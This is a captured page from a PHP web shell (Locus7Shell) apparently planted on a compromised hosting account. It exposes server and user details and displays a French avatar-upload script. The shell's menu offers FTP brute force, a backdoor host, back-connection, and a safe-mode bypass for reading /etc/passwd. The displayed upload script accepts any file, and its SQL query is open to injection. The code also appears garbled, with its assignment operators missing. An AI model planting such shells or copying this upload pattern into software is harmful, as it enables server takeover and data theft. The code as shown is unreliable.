Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/   drwx---r-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     uploadavatar.php (1.21 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

//connection à la database
include ("connect.php");
echo "<br><span class='Style5'>";
$user $_SESSION['identifiant'];

if (isset($_POST['submit']))
{
//récuperer le fichier envoyé

 $name $_FILES['myfile']['name'];
 $size $_FILES['myfile']['size']; //voir le tutorial upload pour vérifier que c'est une image
 $tmp_name $_FILES['myfile']['tmp_name'];

    if ($name)
    {
      //Chargement en cours
      $location ="avatars/$user.$name";
      move_uploaded_file($tmp_name,$location); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
      $query mysql_query("UPDATE users SET IMAGELOCATION='$location' WHERE PSEUDO='$user'");
      
      echo("Votre avatar est maintenant enregistré <a href='index.php?page=Member'>Retour</a><br>");
      
    }
    else
    echo("Sélectionner un fichier!");

}
else
{
echo "<span class='Style6'>Bienvenue ".$user."</span><p>";
echo "Mettre à jour votre avatar:<br>
<img src='image/transparent.png' width='30' height='4' /><br>
<form action='index.php?page=uploadavatar' method='POST' enctype='multipart/form-data'>
 Fichier: <input type='file' name='myfile'> <input type='submit' name='submit' value='Charger'>
</form>";
}

echo '</span>';
?>

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 
Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0055 ]--